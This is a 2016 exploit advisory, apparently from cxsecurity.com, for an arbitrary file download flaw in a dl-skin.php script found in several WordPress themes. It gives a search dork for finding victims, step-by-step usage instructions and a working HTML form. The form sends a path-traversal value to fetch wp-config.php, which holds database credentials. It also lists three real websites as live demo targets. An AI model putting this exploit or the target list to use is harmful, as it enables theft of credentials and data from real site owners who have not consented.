Wordpress Multi Themes Arbitrary File Download Vulnerability

2016.08.23
mr xBADGIRL21 (MR) mr
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################### # Exploit Title : Wordpress Multi Themes Arbitrary File Download Vulnerability # Exploit Author : xBADGIRL21 # Dork : wp-content/themes/ /lib/scripts/ # Tested on: [ BackBox ] # skype:xbadgirl21 # Date: 22/08/2016 # video Proof : https://youtu.be/DFtF14_ShHk # Myblog : http://xbadgirl21.blogspot.com/ ###################### # [+] DESCRIPTION : ###################### # [+] Wordpress Multi Themes Arbitrary File Download iT's an Exploit Allow Attackers to Download # [+] Files From Your Website and The Vulnerable File is : dl-skin.php # [+] so Any Theme Wordpress Has This File Then he is Potentially Vulnerable ###################### # [+] USAGE : 1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1 + 1.- Use Dork Above [ok] + + 2.- Download Exploit File Edit it [ok] + + 3.- Edit: http://localhost/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php [ok] + + 4.- Edit: the value you want To Download [ok] + + 5.- Run Exploit + 1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1 ###################### # [+] Exploit: ###################### <html> <body> <form action="http://localhost/wp-content/themes/awake/lib/scripts/dl-skin.php" method="post"> Download:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br> <input type="submit"> </form> </body> </html> ###################### # [+] Live Demo : ###################### # http://www.bonkersbeat.com/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php # http://www.aemdum.ca/test/wp-content/themes/method/lib/scripts/dl-skin.php # http://www.tumct.org/wp-content/themes/awake/lib/scripts/dl-skin.php ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ####################### ### Note ### : Themes Vuln ####################### # Vuln themes not all : https://ghostbin.com/paste/yg36k #######################

References:

https://youtu.be/DFtF14_ShHk


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top